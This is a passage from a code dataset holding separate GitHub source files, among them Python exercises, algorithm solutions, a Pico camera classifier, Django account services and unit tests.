channel_metadata={},\n remote_created_at=datetime.utcnow(),\n remote_updated_at=None,\n )\n past_transmission_to_delete = factories.ContentMetadataItemTransmissionFactory(\n content_id=content_id_2,\n enterprise_customer=self.enterprise_config.enterprise_customer,\n plugin_configuration_id=self.enterprise_config.id,\n integrated_channel_code=self.enterprise_config.channel_code(),\n content_last_changed='2021-07-16T15:11:10.521611Z',\n enterprise_customer_catalog_uuid=self.enterprise_customer_catalog.uuid,\n remote_created_at=datetime.utcnow(),\n remote_deleted_at=None,\n )\n new_transmission_to_create = factories.ContentMetadataItemTransmissionFactory(\n content_id=content_id_3,\n enterprise_customer=self.enterprise_config.enterprise_customer,\n plugin_configuration_id=self.enterprise_config.id,\n integrated_channel_code=self.enterprise_config.channel_code(),\n content_last_changed='2021-07-16T15:11:10.521611Z',\n enterprise_customer_catalog_uuid=self.enterprise_customer_catalog.uuid,\n remote_created_at=None,\n )\n\n new_channel_metadata = {\n 'title': 'edX Demonstration Course',\n 'key': content_id_1,\n 'content_type': 'course',\n 'start': '2030-01-01T00:00:00Z',\n 'end': '2030-03-01T00:00:00Z'\n }\n past_transmission_to_update.channel_metadata = new_channel_metadata\n\n transmitter = CornerstoneContentMetadataTransmitter(self.enterprise_config)\n\n create_payload = {\n content_id_3: new_transmission_to_create\n }\n update_payload = {\n content_id_1: past_transmission_to_update\n }\n delete_payload = {\n content_id_2: past_transmission_to_delete\n }\n transmitter.transmit_for_web(create_payload, update_payload, delete_payload)\n item_updated = ContentMetadataItemTransmission.objects.filter(\n enterprise_customer_catalog_uuid=self.enterprise_customer_catalog.uuid,\n content_id=content_id_1,\n ).first()\n assert item_updated.remote_updated_at\n assert item_updated.channel_metadata == new_channel_metadata\n item_deleted = ContentMetadataItemTransmission.objects.filter(\n enterprise_customer_catalog_uuid=self.enterprise_customer_catalog.uuid,\n content_id=content_id_2,\n ).first()\n assert item_deleted.remote_deleted_at\n item_created = ContentMetadataItemTransmission.objects.filter(\n enterprise_customer_catalog_uuid=self.enterprise_customer_catalog.uuid,\n content_id=content_id_3,\n ).first()\n assert item_created.remote_created_at\n","repo_name":"openedx/edx-enterprise","sub_path":"tests/test_integrated_channels/test_cornerstone/test_transmitters/test_content_metadata.py","file_name":"test_content_metadata.py","file_ext":"py","file_size_in_byte":5845,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"70"}
+{"seq_id":"6229487661","text":"class calisan():\r\n\r\n\r\n zam_oranı = 1.05\r\n per_say = 0\r\n\r\n def __init__(self,ad,soyad,maas):\r\n self.ad = ad\r\n self.soyad = soyad\r\n self.maas = maas\r\n self.eposta = self.ad+self.soyad+\"@sirket.com\"\r\n calisan.per_say +=1\r\n\r\n def tamad(self):\r\n return \"adı : {} soyadı : {}\".format(self.ad, self.soyad)\r\n\r\n def arttir(self):\r\n # self.maas = (self.maas*1.05)\r\n # self.maas = (self.maas * calisan.zam_oranı)\r\n self.maas = (self.maas * self.zam_oranı)\r\n\r\n\r\n\r\n\r\nclass gelistirici(calisan):#çalışandan gelistirici sınıfını üretmek\r\n def __init__(self, ad, soyad, maas, p_dili):\r\n # calisan.__init__(self,ad,soyad,maas)\r\n super().__init__(ad, soyad, maas)\r\n self.p_dili = p_dili\r\n self.zam_oranı = 1.2\r\nclass yonetici(calisan):\r\n\r\n def __init__(self,ad,soyad,maas,calisan= None):\r\n super().__init__(ad,soyad,maas)\r\n if calisan is None:\r\n self.calisan= []\r\n else:\r\n self.calisan = calisan\r\n\r\n def eleman_ekle(self,eleman):\r\n self.calisan.append(eleman)\r\n\r\n def calisan_listele(self):\r\n\r\n for eleman in calisan:\r\n print(eleman.tamad())\r\n\r\npersonel1 = calisan(\"ali\",\"demir\",2500)\r\npersonel2 = calisan(\"kerim\",\"bakir\",1950)\r\n\r\ngel1 = gelistirici(\"mehmet\",\"can\",2250,\"Python\")\r\n# print(gel1.tamad(), gel1.p_dili, gel1.maas)\r\ngel1.arttir()\r\n# print(gel1.maas)\r\n\r\nyonet1 = yonetici(\"kamil\",\"eren\",6500,[gel1,personel1])\r\nprint(yonet1.tamad())\r\nprint(yonet1.calisan_listele())\r\nyonet1.eleman_ekle(personel2)\r\nprint(yonet1.calisan_listele())\r\nyonet1.eleman_cikar(gel1)\r\nprint(yonet1.calisan_listele())\r\n\r\nprint(isinstance(personel2,yonetici))\r\n\r\nprint(issubclass(calisan,yonetici))\r\nprint(issubclass(gelistirici,calisan))","repo_name":"KadirTaban/OOP","sub_path":"oop_4.py","file_name":"oop_4.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"17130868675","text":"import json\nimport os.path as path\nfrom containers.container import Container\n\n\ndef write_data(in_data) -> None:\n out_data = []\n\n for item in in_data:\n out_data.append(item.__dict__)\n\n json_object = json.dumps(out_data)\n f = open(\"db/data.json\", \"w\")\n f.write(json_object)\n\n\ndef read_data() -> Container:\n container = Container()\n if not path.isfile(\"db/data.json\"):\n return container\n\n f = open(\"db/data.json\")\n data = json.load(f)\n\n for item in data:\n container.store(item[\"name\"])\n\n return container\n","repo_name":"JimmyCamus/PYTHON-Change-Wallpaper","sub_path":"utils/handle_db.py","file_name":"handle_db.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"29566424101","text":"'''\n654. Maximum Binary Tree\n\nGiven an integer array with no duplicates. A maximum tree building on this array is defined as follow:\n\nThe root is the maximum number in the array.\nThe left subtree is the maximum tree constructed from left part subarray divided by the maximum number.\nThe right subtree is the maximum tree constructed from right part subarray divided by the maximum number.\nConstruct the maximum tree by the given array and output the root node of this tree.\n\nExample 1:\nInput: [3,2,1,6,0,5]\nOutput: return the tree root node representing the following tree:\n\n 6\n / \\\n 3 5\n \\ / \n 2 0 \n \\\n 1\nNote:\nThe size of the given array will be in the range [1,1000].\n'''\n\nfrom typing import List\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n def printTree(self):\n if self.left != None:\n self.left.printTree()\n\n print(self.val)\n\n if self.right != None:\n self.right.printTree()\n\nclass Solution:\n\n # Recursive solution in O(n)\n def constructMaximumBinaryTree(self, nums: List[int]) -> TreeNode:\n \n if len(nums) <= 0:\n return None\n\n i = v = -1\n for c, n in enumerate(nums):\n if n > v:\n v = n\n i = c\n\n node = TreeNode(v)\n node.left = self.constructMaximumBinaryTree(nums[0:i])\n node.right = self.constructMaximumBinaryTree(nums[i+1:])\n return node\n\ns = Solution()\nnode = s.constructMaximumBinaryTree([3,2,1,6,0,5])\nnode.printTree()","repo_name":"AWAlexWeber/python-practice","sub_path":"LeetCode/Solved/Medium/MaximumBinaryTree.py","file_name":"MaximumBinaryTree.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"33390525341","text":"\r\nfrom sqlite3 import*\r\nconnection=sqlite3.connect(\"test.db\")\r\ncursor=connection.cursor()#adds cursor -what you use to interact with database\r\n\r\n\r\ncursor.execute(\"\"\"create table IF NOT EXISTS testone \r\n(one integer\r\n,two text\r\n,three text\r\n,four text\r\n)\"\"\")#inside are columns/categorys\r\n\r\n#inserting data into database\r\ncursor.execute(\"INSERT INTO testone VALUES ('1','steve','bob','jeff')\")\r\n\r\n\r\nconnection.commit()#pushes changes into database\r\n\r\ncursor.execute(\"SELECT*FROM testone\")#selects a table in database\r\nresults=cursor.fetchall()#selects everything within that table\r\nprint(results)\r\nconnection.close()\r\n","repo_name":"Edt12/Tests-and-Experiments","sub_path":"Sqlite test.py","file_name":"Sqlite test.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"34644710855","text":"\"\"\"\n Insert Node at a specific position in a linked list\n head input could be None as well for empty list\n Node is defined as\n\n class Node(object):\n\n def __init__(self, data=None, next_node=None):\n self.data = data\n self.next = next_node\n\n return back the head of the linked list in the below method.\n\n This is a \"method-only\" submission.\n You only need to complete this method.\n\"\"\"\n\nfrom Node import Node\n\n\ndef insert_nth(head, data, position):\n if position == 0:\n return Node(data, head)\n\n current = head\n prev = Node()\n p = Node(data, None)\n pos = 0\n while current:\n pos += 1\n prev = current\n current = current.next\n if pos == int(position):\n prev.next = p\n p.next = current\n return head\n","repo_name":"darwinz/hackerrank","sub_path":"data-structures/python/linked-list-insert-node-at-nth.py","file_name":"linked-list-insert-node-at-nth.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"70545451108","text":"\"\"\"Producer - Consumer pattern.\n\nThis script goes on forever. Terminate it with Ctrl+C.\n\nSome producer/s thread/s produce/s some sort of data or item and put it into a SHARED buffer (here is a simple python list).\nProducer threads should not put more data than the buffer can contain.\n\nSome consumer/s thread/s fetch/es the data from the buffer.\nConsumer thread should not read from an empty buffer.\n\nUsage:\n $ python producer_consumer_pattern.py\n\nSee Also:\n producer_consumer_queue.py\n\"\"\"\nimport time\nimport random\nimport argparse\nimport threading\nfrom argparse import RawDescriptionHelpFormatter\n\n# we use a list to act as the shared buffer\noperands = []\n\n# event used to understand whether the shared buffer is accessible or not\nevent = threading.Event()\n\n\nclass Producer(threading.Thread):\n\n def run(self):\n while True:\n (x, y) = random.randint(1, 100000), random.randint(1, 100000)\n operands.append((x, y))\n print(f\"{self.name} added: ({x}, {y})\")\n # set an event to communicate that the buffer can be read by a consumer thread\n event.set()\n time.sleep(random.random())\n\n\nclass Consumer(threading.Thread):\n\n def run(self):\n while True:\n time.sleep(random.random())\n # wait for an event to avoid reading from an empty buffer. This event is set by the producer thread\n event.wait()\n (x, y) = operands.pop()\n print(f\"Product of ({x}*{y}) = {x*y}\")\n # clear the event, so the producer thread can set it again\n event.clear()\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description=__doc__, formatter_class=RawDescriptionHelpFormatter\n )\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = parse_args()\n Producer().start()\n Consumer().start()\n","repo_name":"jackdbd/concurrent-programming-python","sub_path":"producer_consumer_pattern.py","file_name":"producer_consumer_pattern.py","file_ext":"py","file_size_in_byte":1861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"14180780734","text":"''' min/max '''\n\n# 10818번\nn = int(input())\nnumList = list(map(int, input().split()))\nnumList.sort()\nprint(numList[0], numList[-1])\n\n# 2562번 (파이참 결과는 맞는데 백준 제출은 틀렸습니다?)\nnumList, max= [], 0\nfor i in range(10):\n numList.append(int(input()))\n if numList[i-1] < numList[i]:\n max = numList[i]\nprint(max, numList.index(max)+1, sep=\"\\n\") #인덱스 0부터 시작하기 때문에 +1\n\n# 2562번 => max함수 사용\nnumList=[]\nfor i in range(9):\n numList.append(int(input()))\nprint(max(numList), numList.index(max(numList))+1, sep=\"\\n\")\n","repo_name":"jin-hyojoo/study__algorithm","sub_path":"단계별 풀어보기/One-Dimensional Arrays/q_10818, 2562.py","file_name":"q_10818, 2562.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"72329559586","text":"import gc\nimport sys\nfrom time import sleep\n\nimport bitmaptools\nimport board\nimport busio\nimport digitalio\nimport displayio\nimport svm_min\nimport terminalio\nfrom adafruit_bitmap_font import bitmap_font\nfrom adafruit_display_text import label\nfrom adafruit_ov7670 import OV7670\nfrom adafruit_st7735r import ST7735R\n\n\n# Function to convert RGB565_SWAPPED to grayscale\ndef rgb565_to_1bit(pixel_val):\n pixel_val = ((pixel_val & 0x00FF)<<8) | ((25889 & 0xFF00) >> 8)\n r = (pixel_val & 0xF800)>>11\n g = (pixel_val & 0x7E0)>>5\n b = pixel_val & 0x1F\n return (r+g+b)/128\n\n\n#Setting up the TFT LCD display\nmosi_pin = board.GP11\nclk_pin = board.GP10\nreset_pin = board.GP17\ncs_pin = board.GP18\ndc_pin = board.GP16\n\ndisplayio.release_displays()\nspi = busio.SPI(clock=clk_pin, MOSI=mosi_pin)\ndisplay_bus = displayio.FourWire(\n spi, command=dc_pin, chip_select=cs_pin, reset=reset_pin\n)\n\ndisplay = ST7735R(display_bus, width=128, height=160, bgr=True)\ngroup = displayio.Group( scale=1)\ndisplay.show(group)\n\nfont = bitmap_font.load_font(\"./Helvetica-Bold-16.bdf\")\ncolor = 0xffffff\ntext_area = label.Label(font, text='', color=color)\ntext_area.x = 10\ntext_area.y = 140\ngroup.append(text_area)\n\ncam_width = 80\ncam_height = 60\ncam_size = 3 #80x60 resolution\n\ncamera_image = displayio.Bitmap(cam_width, cam_height, 65536)\ncamera_image_tile = displayio.TileGrid(\n camera_image ,\n pixel_shader=displayio.ColorConverter(\n input_colorspace=displayio.Colorspace.RGB565_SWAPPED\n ),\n x=30,\n y=30,\n)\ngroup.append(camera_image_tile)\ncamera_image_tile.transpose_xy=True\n\ninference_image = displayio.Bitmap(12,12, 65536)\n\n#Setting up the camera\ncam_bus = busio.I2C(board.GP21, board.GP20)\n\ncam = OV7670(\n cam_bus,\n data_pins=[\n board.GP0,\n board.GP1,\n board.GP2,\n board.GP3,\n board.GP4,\n board.GP5,\n board.GP6,\n board.GP7,\n ],\n clock=board.GP8,\n vsync=board.GP13,\n href=board.GP12,\n mclk=board.GP9,\n shutdown=board.GP15,\n reset=board.GP14,\n)\ncam.size = cam_size\ncam.flip_y = True\n\nctr = 0\nwhile True:\n cam.capture(camera_image)\n sleep(0.1)\n temp_bmp = displayio.Bitmap(cam_height, cam_height, 65536)\n for i in range(0,cam_height):\n for j in range(0,cam_height):\n temp_bmp[i,j] = camera_image[i,j]\n bitmaptools.rotozoom(inference_image,temp_bmp,scale=12/cam_height,ox=0,oy=0,px=0,py=0)\n del(temp_bmp)\n\n input_data = []\n for i in range(0,12):\n for j in range(0,12):\n gray_pixel = 1 -rgb565_to_1bit(inference_image[i,j])\n if gray_pixel < 0.5:\n gray_pixel = 0\n input_data.append(gray_pixel)\n\n camera_image.dirty()\n display.refresh(minimum_frames_per_second=0)\n prediction = svm_min.score(input_data)\n #Uncomment these lines for debugging\n ctr = ctr + 1\n if ctr%50 == 0:\n print(input_data)\n print(\"------\")\n res = prediction.index(max(prediction))\n #print(res)\n text_area.text = \"Prediction : \" +str(res)\n sleep(0.01)\n\n","repo_name":"code2k13/rpipico_digit_classification","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"70"}
+{"seq_id":"40136415877","text":"\"\"\"\nprocess_list.py can send the entire process list in a dict, with event_type: process_list (initially)\n\t\t\t\tand will ping the server when there's a change in the process list with a dict \n\t\t\t\tof the additional or removed process(es), with event_type: process_update\n\"\"\"\n\nimport psutil\nfrom time import time, sleep\nimport json\nimport requests\n\n# with stored names\ndef get_procs_list():\n\tfetched_procs = list(psutil.process_iter())\n\tprocs_id_name = {}\n\tprocs = []\n\tfor p in fetched_procs:\n\t\tprocs.append(p)\n\t\ttry:\n\t\t\tp_name = p.name()\n\t\texcept:\n\t\t\tp_name = None\n\t\tprocs_id_name[p.pid] = p_name\n\treturn procs, procs_id_name\n\ndef on_terminate(proc):\n\tprint(\"Process {} terminated with exit code {}\".format(proc, proc.returncode))\n\ndef detect_terminate(procs):\n\tterminated, alive = psutil.wait_procs(procs, timeout=2, callback=on_terminate)\n\treturn terminated, alive\n\ndef detect_add(procs, new_procs):\n\tadded = []\n\tfor p in new_procs:\n\t\tif p not in procs:\n\t\t\tadded.append(p)\n\treturn added\n\ndef post_procs_list(procs, url, event_type):\n\tdata = {}\n\tfor p in procs:\n\t\ttry:\n\t\t\tp_name = p.name()\n\t\t\tdata[p.pid] = p_name\n\t\texcept:\n\t\t\tprint(\"Process {} had no name\".format(p))\n\t\t\tpass\n\tevent = json.dumps({\"event_type\": \"process_list\", \"procs\": data})\n\tresponse = requests.post(url, data=json.dumps(event), headers={\"Content-type\": \"application/json\"})\n\treturn response\n\nif __name__ == \"__main__\":\n\told_procs, old_procs_id_name = get_procs_list()\n\tprocs, procs_id_name = old_procs[:], old_procs_id_name\n\n\turl = \"http://0.0.0.0:8080/event_trigger\"\n\tresponse = post_procs_list(procs_id_name, url)\n\tprint(\"Posted procs list with response {}\".format(response))\n\n\t# detect terminated and added processes, then update process list\n\twhile True:\n\t\tterminated, alive = detect_terminate(procs)\n\t\tprint(\"Terminated: {}\".format(terminated))\n\t\tfor p in terminated:\n\t\t\tprint(\"Terminated pid: {}\".format(p.pid))\n\t\t\tif p.pid in old_procs_id_name:\n\t\t\t\tprint(\"Matched with old pid\")\n\t\t\t\tprint(\"Name of terminated process: {}\".format(old_procs_id_name[p.pid]))\n\t\t\tdel procs_id_name[p.pid]\n\t\t\t# get the mode in data obj's names (vals) -- should give mode and all\n\t\t\tevent = json.dumps({\"event_type\": \"process_update\", \"update_type\": \"termination\", \"proc\": procs_id_name, \"pid\": p.pid})\n\t\t\tresponse = requests.post(url, data=json.dumps(event), headers={\"Content-type\": \"application/json\"})\n\t\t\tprint(\"Posted termination of process {} with response {}\".format(p, response))\n\t\t\tprocs.remove(p)\n\t\tadded = detect_add(old_procs, procs)\n\t\tprint(\"Added: {}\".format(added))\n\t\tfor p in added:\n\t\t\ttry:\n\t\t\t\tp_name = p.name()\n\t\t\t\tprint('Name of added: {}'.format(p_name))\n\t\t\t\tprocs_id_name[p.pid] = p_name\n\t\t\texcept:\n\t\t\t\tprint('Cannot find name of {}'.format(p))\n\t\t\t\tpass\t\t\n\t\t\tevent = json.dumps({\"event_type\": \"process_update\", \"update_type\": \"addition\", \"proc\": procs_id_name, \"pid\": p.pid})\n\t\t\tresponse = requests.post(url, data=json.dumps(event), headers={\"Content-type\": \"application/json\"})\n\t\t\tprint(\"Posted addition of process {} with response {}\".format(p, response))\n\t\t\tprocs.append(p)\n\t\tprint(\"Size of procs list, old {}: new {}\".format(len(old_procs), len(procs)))\n\t\told_procs = procs[:]\n\t\tsleep(2.0 - time() % 2.0)\n\t\tprocs, procs_id_name = get_procs_list()\n\n\n","repo_name":"Ejhfast/virtual_assistant","sub_path":"process_list.py","file_name":"process_list.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"41389444697","text":"\"\"\"\r\nLibrary Fine: https://www.hackerrank.com/challenges/library-fine/problem\r\n\r\n\"\"\"\r\n\r\n#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n# Complete the libraryFine function below.\r\ndef libraryFine(d1, m1, y1, d2, m2, y2):\r\n if y2>y1:\r\n return 0\r\n if y2==y1 and m2>m1:\r\n return 0\r\n if y2==y1 and m2==m1 and d2>d1:\r\n return 0\r\n \r\n fine=0\r\n if y1==y2:\r\n if m1==m2:\r\n fine=15*(d1-d2)\r\n else:\r\n fine=500*(m1-m2)\r\n else:\r\n fine=10000\r\n return fine\r\n\r\n\r\nif __name__ == '__main__':\r\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n d1M1Y1 = input().split()\r\n\r\n d1 = int(d1M1Y1[0])\r\n\r\n m1 = int(d1M1Y1[1])\r\n\r\n y1 = int(d1M1Y1[2])\r\n\r\n d2M2Y2 = input().split()\r\n\r\n d2 = int(d2M2Y2[0])\r\n\r\n m2 = int(d2M2Y2[1])\r\n\r\n y2 = int(d2M2Y2[2])\r\n\r\n result = libraryFine(d1, m1, y1, d2, m2, y2)\r\n\r\n fptr.write(str(result) + '\\n')\r\n\r\n fptr.close()\r\n","repo_name":"arpita-ak/APS-2020","sub_path":"Hackerrank solutions/Easy- Library Fine.py","file_name":"Easy- Library Fine.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"1907343765","text":"from datetime import timedelta\nfrom django.utils import timezone\nfrom apps.core.services.controllers import ResponseController\nfrom ..models import ActivationCode, TBConfiguration, User, TBUserToken\nfrom apps.core.services.validators import ImageController\nfrom ...billing.models import Transaction, get_tezbor_account, UserAccount\nfrom ...core.services.generics import TBResponse\nfrom ...core.services.model_status import *\n\n\nclass TBException(ResponseController):\n\n def phone_number_isvalid(self):\n phone = self.request.data['phone_number']\n if len(phone) != 13 or not phone[1:].isnumeric() or phone[:4] != '+998' or phone[4:6] == \"69\":\n return False\n else:\n return True\n\n def user_exists(self, phone):\n if not self.phone_number_isvalid():\n self.update_error_text(catch=phone)\n self.code = TBResponse.CODE_6\n self.error_message = TBResponse.MSG_6\n return self.error_response()\n qs_user = User.objects.filter(phone_number=phone)\n if qs_user.exists():\n user = qs_user.first()\n self.update_error_text(catch=phone)\n if user.status == UserStatus.NOTACTIVATED:\n self.code = TBResponse.CODE_7\n self.error_message = TBResponse.MSG_7\n else:\n self.code = TBResponse.CODE_1\n self.error_message = TBResponse.MSG_1\n return self.error_response()\n else:\n return False\n\n\nclass AccountController(TBException, ImageController):\n\n def __init__(self, request=None):\n super().__init__(request)\n self.request = request\n\n @staticmethod\n def authentication(user, device, meta, dt):\n token = TBUserToken.objects.create(user=user, device_token=device, user_agent=str(meta), device_type=dt)\n return token.key\n\n @staticmethod\n def delete_access_token(token):\n qs = TBUserToken.objects.filter(key=token)\n if qs.exists():\n qs.delete()\n return True\n else:\n return False\n\n @staticmethod\n def delete_expired_code(phone, sms_type):\n qs_act = ActivationCode.objects.filter(phone=phone, sms_type=sms_type)\n if qs_act.exists():\n qs_act.delete()\n\n @staticmethod\n def not_expired(obj):\n now = timezone.now()\n timeout = TBConfiguration.get_config(key=\"expiration_sms_confirmation\", if_not_found=180000)\n end_time = obj.timestamp + timedelta(milliseconds=int(timeout))\n if now > end_time:\n return True\n else:\n return False\n\n def _get_or_create_confirmation_code(self, user, phone, sms_type):\n qs = ActivationCode.objects.filter(phone=phone, activated=False, sms_type=sms_type)\n if qs.exists():\n code = qs.first()\n is_not_expired = self.not_expired(obj=code)\n if not is_not_expired:\n obj = code\n else:\n self.delete_expired_code(phone=phone, sms_type=sms_type)\n obj = ActivationCode.objects.create(user=user, phone=phone, sms_type=sms_type)\n else:\n self.delete_expired_code(phone=phone, sms_type=sms_type)\n obj = ActivationCode.objects.create(user=user, phone=phone, sms_type=sms_type)\n return obj\n\n def resend_sms(self, user, phone, sms_type):\n code_created = self._get_or_create_confirmation_code(user=user, phone=phone, sms_type=sms_type)\n if code_created:\n return True\n else:\n return False\n\n def set_referrer(self, user):\n data = self.request.data\n if \"referrer\" in data:\n qs = User.objects.filter(phone_number=data[\"referrer\"])\n if qs.exists() and user.referrer is None:\n referrer = qs.first()\n user.referrer = referrer\n user.save(update_fields=[\"referrer\"])\n\n def update_referrer_balance(self, user):\n referral_fee = TBConfiguration.get_config(key=\"referral_fee\", if_not_found=5000)\n bonus = int(referral_fee)\n tb_account = get_tezbor_account()\n receivers = UserAccount.objects.filter(user=user.referrer, type=UserAccountType.TEZBOR)\n if tb_account and receivers.exists():\n receiver = receivers.first()\n try:\n Transaction.objects.create(\n payer=tb_account,\n receiver=receiver,\n paymethod=PaymentType.TEZBOR_PAYMENT,\n reason=TransactionType.RECEIVED_BY_REFERRING,\n amount=bonus)\n except Exception as e:\n print(\"update_referrer_balance......\", e.args)\n\n\n def get_tb_app_type(self):\n data = self.request.data\n # print(\"get_tb_app_type...\", data)\n if \"app_type\" in data:\n return data[\"app_type\"]\n else:\n return ApplicationType.CUSTOMER_APP\n\n def send_activation_code(self, user, phone):\n if user.status == UserStatus.TOBEACTIVATED or user.status == UserStatus.ACTIVATED or user.status == UserStatus.NOTACTIVATED:\n if self.resend_sms(user=user, phone=phone, sms_type=ActivationType.LOGIN):\n return self.success_response()\n else:\n self.code = TBResponse.CODE_30\n self.error_message = TBResponse.MSG_30\n return self.error_response()\n else:\n self.code = TBResponse.CODE_3\n self.error_message = TBResponse.MSG_3\n return self.error_response()\n\n\n\n","repo_name":"muhtor/micro-serice","sub_path":"server/src/apps/accounts/utils/services.py","file_name":"services.py","file_ext":"py","file_size_in_byte":5592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"440166579","text":"from datetime import datetime\nfrom typing import Optional, Dict\n\nfrom rf_api_client.models.node_types_api_models import NodeTypeDto\nfrom rf_api_client.models.nodes_api_models import NodeTreeDto, PositionType, NodeAccessType, NodeMetaDto, \\\n NodeTreeBodyDto, NodeBodyMetaDto, NodePropertiesDto, GlobalGroupDto, StyleGroupDto\n\nfrom rf_client.matchers import match_type_id, match_nontyped, match_type_name, match_typed_property, match_all, \\\n match_any\nfrom rf_client.tree_wrapper import NodeWrapper\n\n\ndef build_node(\n type_id: Optional[str] = None,\n type_props: Optional[Dict[str, str]] = None,\n) -> NodeWrapper:\n node, _ = NodeWrapper.from_tree_dto(\n NodeTreeDto(\n id='node_id',\n map_id='map-id',\n parent=None,\n original_parent=None,\n position=(PositionType.P, '0'),\n access=NodeAccessType.user_all,\n hidden=False,\n readers=[],\n node_level=0,\n meta=NodeMetaDto(\n creation_timestamp=datetime.utcfromtimestamp(0),\n author='',\n last_modified_timestamp=datetime.utcfromtimestamp(0),\n last_modified_user='',\n can_move=True,\n editable=True,\n commentable=True,\n can_set_access=True,\n leaf=True,\n ),\n body=NodeTreeBodyDto(\n id='node_id',\n map_id='map-id',\n type_id=type_id,\n parent=None,\n children=[],\n access=NodeAccessType.user_all,\n unread_comments_count=0,\n comments_count=0,\n readers=[],\n meta=NodeBodyMetaDto(\n creation_timestamp=datetime.utcfromtimestamp(0),\n author='',\n last_modified_timestamp=datetime.utcfromtimestamp(0),\n last_modified_user='',\n can_move=True,\n editable=True,\n commentable=True,\n can_set_access=True,\n subscribed=False,\n ),\n properties=NodePropertiesDto(\n global_=GlobalGroupDto(\n title='title',\n ),\n by_type=type_props or {},\n by_user=[],\n style=StyleGroupDto(),\n by_extension={},\n ),\n )\n )\n )\n return node\n\n\ndef build_type(type_id: str, type_name: str) -> NodeTypeDto:\n return NodeTypeDto(\n id=type_id,\n name=type_name,\n map_id='map-id',\n icon=None,\n displayable=True,\n default_child_node_type_id=None,\n properties=[],\n )\n\n\ndef test_type_id():\n node = build_node(type_id='test-type')\n assert match_type_id('test-type')(node)\n assert not match_type_id('another-type')(node)\n\n\ndef test_nontyped():\n node = build_node(type_id=None)\n assert match_nontyped()(node)\n assert not match_type_id('type-id')(node)\n\n\ndef test_type_name():\n types = [\n build_type(type_id='first-type', type_name='First'),\n build_type(type_id='second-type', type_name='Second'),\n ]\n\n first_node = build_node(type_id='first-type')\n assert match_type_name(types, 'First')(first_node)\n assert not match_type_name(types, 'Second')(first_node)\n assert not match_type_name(types, 'Unknown')(first_node)\n\n second_node = build_node(type_id='second-type')\n assert match_type_name(types, 'Second')(second_node)\n assert not match_type_name(types, 'First')(second_node)\n assert not match_type_name(types, 'Unknown')(second_node)\n\n\ndef test_type_property():\n node = build_node(type_props={\n 'Foo': 'Bar',\n 'Baz': 'Qux',\n })\n\n assert match_typed_property('Foo', 'Bar')(node)\n assert match_typed_property('Baz', 'Qux')(node)\n assert not match_typed_property('Foo', '123')(node)\n assert not match_typed_property('Baz', '456')(node)\n assert not match_typed_property('unknown', 'Bar')(node)\n\n\ndef test_all():\n node = build_node(type_id='type-id', type_props={\n 'Foo': 'Bar',\n 'Baz': 'Qux',\n })\n\n assert match_all(\n match_type_id('type-id'),\n match_typed_property('Foo', 'Bar'),\n )(node)\n\n assert match_all(\n match_type_id('type-id'),\n match_typed_property('Foo', 'Bar'),\n match_typed_property('Baz', 'Qux'),\n )(node)\n\n assert not match_all(\n match_type_id('type-id'),\n match_typed_property('Foo', 'Qux'),\n )(node)\n\n assert match_all()(node)\n\n\ndef test_any():\n node = build_node(type_id='type-id', type_props={\n 'Foo': 'Bar',\n 'Baz': 'Qux',\n })\n\n assert match_any(\n match_type_id('type-id'),\n match_typed_property('Foo', 'Bar'),\n )(node)\n\n assert match_any(\n match_type_id('type-id'),\n match_typed_property('Foo', 'Bar'),\n match_typed_property('Baz', 'Qux'),\n )(node)\n\n assert match_any(\n match_type_id('type-id'),\n match_typed_property('Foo', 'Qux'),\n )(node)\n\n assert not match_any(\n match_type_id('type-id-2'),\n match_typed_property('Foo', 'Qux'),\n )(node)\n\n assert not match_any()(node)\n","repo_name":"RedForester/python_rf_client","sub_path":"tests/matchers_test.py","file_name":"matchers_test.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
